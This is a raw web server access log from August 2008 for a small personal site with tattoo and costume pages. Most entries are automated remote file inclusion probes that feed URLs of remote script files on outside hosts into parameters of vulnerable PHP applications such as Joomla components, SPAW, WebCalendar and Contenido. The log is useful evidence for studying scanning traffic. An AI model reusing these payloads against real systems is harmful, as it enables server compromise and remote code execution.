216.246.45.200 - - [24/Aug/2008:01:50:07 -0500] "GET /logs/access_log.1206748800//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:01:50:31 -0500] "GET /logs/access_log.1213488000//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
220.73.137.93 - - [24/Aug/2008:01:50:51 -0500] "GET /logs/access_log.1214179200/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 379 "-""libwww-perl/5.79"
216.246.45.200 - - [24/Aug/2008:01:50:52 -0500] "GET /logs/access_log.1206748800//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.10.155.195 - - [24/Aug/2008:01:50:57 -0500] "GET /logs/access_log.1208044800//admin/editor2/spaw_control.class.php?spaw_root=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.812"
69.10.155.195 - - [24/Aug/2008:01:50:57 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
69.10.155.195 - - [24/Aug/2008:01:50:57 -0500] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.812"
216.246.45.200 - - [24/Aug/2008:01:51:10 -0500] "GET /logs/access_log.1213488000//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
216.55.159.47 - - [24/Aug/2008:01:51:14 -0500] "GET /?cfg[path][contenido]=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
216.75.56.186 - - [24/Aug/2008:01:51:50 -0500] "GET /logs//popup_window.php?site_isp_root=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
216.75.56.186 - - [24/Aug/2008:01:51:50 -0500] "GET //popup_window.php?site_isp_root=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
80.248.180.182 - - [24/Aug/2008:01:52:26 -0500] "GET /logs/?sourcedir=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt? HTTP/1.1" 200 96470 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:01:52:26 -0500] "GET /logs/?sourcedir=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt? HTTP/1.1" 200 96470 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:01:52:26 -0500] "GET /?sourcedir=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:01:52:26 -0500] "GET /?sourcedir=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:01:52:53 -0500] "GET /logs/access_log.1215043200/?sourcedir=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:01:52:54 -0500] "GET /logs/?sourcedir=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt?? HTTP/1.1" 200 96470 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:01:52:54 -0500] "GET /?sourcedir=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
64.34.171.29 - - [24/Aug/2008:01:53:22 -0500] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.skkulove.com//bbs/c_h_i_t_o_z.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
64.34.171.29 - - [24/Aug/2008:01:53:22 -0500] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://www.skkulove.com//bbs/c_h_i_t_o_z.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
193.111.11.7 - - [24/Aug/2008:01:53:30 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
193.111.11.7 - - [24/Aug/2008:01:53:31 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
24.19.3.168 - - [24/Aug/2008:01:54:31 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
24.19.3.168 - - [24/Aug/2008:01:54:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
24.19.3.168 - - [24/Aug/2008:01:54:31 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
24.19.3.168 - - [24/Aug/2008:01:54:31 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
89.208.43.121 - - [24/Aug/2008:01:54:55 -0500] "GET /logs/?sourcedir=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt? HTTP/1.1" 200 96470 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:01:54:55 -0500] "GET /?sourcedir=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:01:54:56 -0500] "GET /logs/?sourcedir=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt? HTTP/1.1" 200 96470 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:01:54:56 -0500] "GET /?sourcedir=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
65.254.49.34 - - [24/Aug/2008:01:55:10 -0500] "GET /logs/access_log.1199059200//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.810"
65.254.49.34 - - [24/Aug/2008:01:55:28 -0500] "GET /logs/access_log.1214179200/?custompluginfile[]=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
65.254.49.34 - - [24/Aug/2008:01:55:28 -0500] "GET /?custompluginfile[]=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
65.254.49.34 - - [24/Aug/2008:01:55:28 -0500] "GET /logs/?custompluginfile[]=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 96470 "-""libwww-perl/5.810"
216.55.159.47 - - [24/Aug/2008:01:58:21 -0500] "GET /logs/access_log.1214524800/?cfg[path][contenido]=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
216.55.159.47 - - [24/Aug/2008:01:58:21 -0500] "GET /?cfg[path][contenido]=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
216.55.159.47 - - [24/Aug/2008:01:58:21 -0500] "GET /logs/?cfg[path][contenido]=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 200 96470 "-""libwww-perl/5.803"
65.254.49.34 - - [24/Aug/2008:01:58:38 -0500] "GET /logs/access_log.1200355200//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.810"
67.195.37.156 - - [24/Aug/2008:02:01:17 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.156 - - [24/Aug/2008:02:01:18 -0500] "GET /costume/index1.htm HTTP/1.0" 200 21563 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.156 - - [24/Aug/2008:02:01:50 -0500] "GET /costume/thmb6.htm HTTP/1.0" 200 3118 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.200.171.55 - - [24/Aug/2008:02:03:38 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:02:03:38 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:02:03:38 -0500] "GET /phphtml.php?htmlclass_path=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:02:03:39 -0500] "GET /phphtml.php?htmlclass_path=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:02:03:39 -0500] "GET /logs/phphtml.php?htmlclass_path=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.200.171.55 - - [24/Aug/2008:02:03:39 -0500] "GET /logs/phphtml.php?htmlclass_path=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
72.5.54.215 - - [24/Aug/2008:02:05:35 -0500] "GET /logs/access_log.1199059200//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:02:05:37 -0500] "GET /logs/access_log.1199059200//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:02:05:47 -0500] "GET /logs/access_log.1199059200//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
216.75.56.186 - - [24/Aug/2008:02:06:08 -0500] "GET /logs/sourceFolder/moduleFolder/form/registrationformsubmit.php=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 386 "-""libwww-perl/5.803"
216.75.56.186 - - [24/Aug/2008:02:06:08 -0500] "GET /sourceFolder/moduleFolder/form/registrationformsubmit.php=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 381 "-""libwww-perl/5.803"
200.150.189.10 - - [24/Aug/2008:02:07:31 -0500] "GET //com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.76"
200.150.189.10 - - [24/Aug/2008:02:07:31 -0500] "GET /logs//com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.76"
216.75.56.186 - - [24/Aug/2008:02:07:51 -0500] "GET /logs/sourceFolder/moduleFolder/form/viewregistrants.php=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 379 "-""libwww-perl/5.803"
216.75.56.186 - - [24/Aug/2008:02:07:51 -0500] "GET /sourceFolder/moduleFolder/form/viewregistrants.php=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 374 "-""libwww-perl/5.803"
195.199.190.37 - - [24/Aug/2008:02:08:12 -0500] "GET /logs//saveserver.php?thisdir=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
195.199.190.37 - - [24/Aug/2008:02:08:13 -0500] "GET //saveserver.php?thisdir=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.195.98.220 - - [24/Aug/2008:02:09:42 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.5.54.215 - - [24/Aug/2008:02:10:09 -0500] "GET /logs/access_log.1200355200//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:02:10:12 -0500] "GET /logs/access_log.1200355200//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:02:10:12 -0500] "GET /logs/access_log.1200355200//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
72.9.233.10 - - [24/Aug/2008:02:11:03 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.9.233.10 - - [24/Aug/2008:02:11:03 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
62.149.232.117 - - [24/Aug/2008:02:11:06 -0500] "GET /logs/access_log.1205366400/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
62.149.232.117 - - [24/Aug/2008:02:11:06 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
62.149.232.117 - - [24/Aug/2008:02:11:07 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
77.75.76.115 - - [24/Aug/2008:02:11:55 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""SeznamBot/2.0 (+http://fulltext.seznam.cz/)"
77.75.76.115 - - [24/Aug/2008:02:11:56 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "-""SeznamBot/2.0 (+http://fulltext.seznam.cz/)"
208.97.183.24 - - [24/Aug/2008:02:13:52 -0500] "GET /logs//forum.php?cfg_file=1&fpath=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
208.97.183.24 - - [24/Aug/2008:02:13:52 -0500] "GET //forum.php?cfg_file=1&fpath=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
216.75.56.186 - - [24/Aug/2008:02:14:16 -0500] "GET /logs/access_log.1208044800//popup_window.php?site_isp_root=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
89.200.171.55 - - [24/Aug/2008:02:15:09 -0500] "GET /logs/access_log.1214524800/phphtml.php?htmlclass_path=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
216.75.56.186 - - [24/Aug/2008:02:16:07 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
216.75.56.186 - - [24/Aug/2008:02:16:07 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
70.85.201.66 - - [24/Aug/2008:02:16:52 -0500] "GET /logs//forum.php?cfg_file=1&fpath=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
70.85.201.66 - - [24/Aug/2008:02:16:52 -0500] "GET //forum.php?cfg_file=1&fpath=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
89.200.171.55 - - [24/Aug/2008:02:17:03 -0500] "GET /logs/access_log.1214524800/phphtml.php?htmlclass_path=http://civetta.altervista.org/dev/v6id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
216.55.159.47 - - [24/Aug/2008:02:17:34 -0500] "GET /logs/access_log.1214438400/?cfg[path][contenido]=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
62.149.232.117 - - [24/Aug/2008:02:18:59 -0500] "GET /logs/access_log.1214179200/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
216.55.159.47 - - [24/Aug/2008:02:21:04 -0500] "GET /logs/access_log.1214179200/?cfg[path][contenido]=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
208.97.183.24 - - [24/Aug/2008:02:21:45 -0500] "GET /logs/access_log.1211500800//forum.php?cfg_file=1&fpath=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
208.97.183.24 - - [24/Aug/2008:02:21:45 -0500] "GET //forum.php?cfg_file=1&fpath=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
208.97.183.24 - - [24/Aug/2008:02:21:45 -0500] "GET /logs//forum.php?cfg_file=1&fpath=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.214.59.54 - - [24/Aug/2008:02:22:14 -0500] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
85.214.59.54 - - [24/Aug/2008:02:22:15 -0500] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
67.195.37.156 - - [24/Aug/2008:02:22:34 -0500] "GET /costume/thmb2.htm HTTP/1.0" 200 3346 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
70.85.201.66 - - [24/Aug/2008:02:22:41 -0500] "GET /logs/access_log.1211500800//forum.php?cfg_file=1&fpath=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
70.85.201.66 - - [24/Aug/2008:02:22:41 -0500] "GET //forum.php?cfg_file=1&fpath=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
70.85.201.66 - - [24/Aug/2008:02:22:41 -0500] "GET /logs//forum.php?cfg_file=1&fpath=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
64.34.171.29 - - [24/Aug/2008:02:23:22 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.skkulove.com//bbs/c_h_i_t_o_z.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
72.5.54.215 - - [24/Aug/2008:02:24:05 -0500] "GET /logs/access_log.1214179200/?custompluginfile[]=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:02:24:05 -0500] "GET /?custompluginfile[]=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:02:24:06 -0500] "GET /logs/?custompluginfile[]=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 96470 "-""libwww-perl/5.65"
80.93.62.114 - - [24/Aug/2008:02:25:02 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:02:25:02 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
65.254.58.42 - - [24/Aug/2008:02:26:49 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:02:26:51 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:02:26:51 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:02:26:51 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
213.194.149.146 - - [24/Aug/2008:02:29:36 -0500] "GET //include/body_comm.inc.php?content=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
213.194.149.146 - - [24/Aug/2008:02:29:36 -0500] "GET /logs/access_log.1212105600//include/body_comm.inc.php?content=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
213.194.149.146 - - [24/Aug/2008:02:29:50 -0500] "GET /logs//include/body_comm.inc.php?content=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
213.194.149.146 - - [24/Aug/2008:02:29:50 -0500] "GET /logs/access_log.1215129600//include/body_comm.inc.php?content=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
213.194.149.146 - - [24/Aug/2008:02:30:03 -0500] "GET /logs/access_log.1214265600//include/body_comm.inc.php?content=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
213.194.149.146 - - [24/Aug/2008:02:30:03 -0500] "GET /logs/access_log.1212019200//include/body_comm.inc.php?content=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
213.194.149.146 - - [24/Aug/2008:02:30:05 -0500] "GET /logs/access_log.1214265600//include/body_comm.inc.php?content=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
213.194.149.146 - - [24/Aug/2008:02:30:06 -0500] "GET /logs/access_log.1212019200//include/body_comm.inc.php?content=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.137.192.222 - - [24/Aug/2008:02:31:45 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
83.137.192.222 - - [24/Aug/2008:02:31:45 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
66.221.68.20 - - [24/Aug/2008:02:33:44 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 404 295 "-""libwww-perl/5.53"
66.221.68.20 - - [24/Aug/2008:02:33:44 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 404 290 "-""libwww-perl/5.53"
80.93.62.114 - - [24/Aug/2008:02:35:12 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:02:35:13 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
83.137.192.222 - - [24/Aug/2008:02:37:02 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
212.234.12.71 - - [24/Aug/2008:02:40:03 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
212.234.12.71 - - [24/Aug/2008:02:40:03 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
12.206.23.168 - - [24/Aug/2008:02:40:21 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
12.206.23.168 - - [24/Aug/2008:02:40:21 -0500] "GET //components/com_flyspray/startdown.php?file=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
74.6.8.121 - - [24/Aug/2008:02:40:38 -0500] "GET /logs/access_log.1204070400 HTTP/1.0" 200 361472 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
91.186.15.66 - - [24/Aug/2008:02:41:08 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
91.186.15.66 - - [24/Aug/2008:02:41:08 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
81.26.209.159 - - [24/Aug/2008:02:43:41 -0500] "GET /logs/access_log.1208044800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
81.26.209.159 - - [24/Aug/2008:02:43:41 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
81.26.209.159 - - [24/Aug/2008:02:43:41 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
